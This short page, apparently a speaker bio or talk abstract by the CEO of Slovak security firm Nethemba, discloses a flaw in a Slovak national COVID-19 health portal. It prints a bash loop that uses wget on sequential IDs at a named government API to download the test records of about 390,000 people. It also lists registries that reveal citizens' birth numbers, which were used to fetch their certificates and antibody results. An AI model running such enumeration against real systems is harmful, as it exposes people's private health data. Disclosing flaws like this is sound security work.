Pavol Luptak
CEO of Nethemba - Slovak IT security company founded in 2007, primarily focused on web application security and various penetration tests.
Pavol Lupták, Nethemba
Obtaining a database of all 390 000 people in Slovakia tested for COVID-19 (yes, no kidding):
#!/bin/bash for (( i=8966; i < 391000; i++ )); do wget https://mojeezdravie.nczisk.sk/api/cntnt.dnld.php/$i done
Of course, it was also possible to identify the birth number of any citizen of the Slovak Republic and download his COVID-19 certificate or a result of his COVID-19 antibodies test.
1. Using the Land Registry, where each title deed contains the name, surname, and date of birth of the owner (and the birth number is also recorded)
2. Using the “leaked” land registry
3. Using the State Population Register (REGOB)
By Pavol Luptak
CEO of Nethemba - Slovak IT security company founded in 2007, primarily focused on web application security and various penetration tests.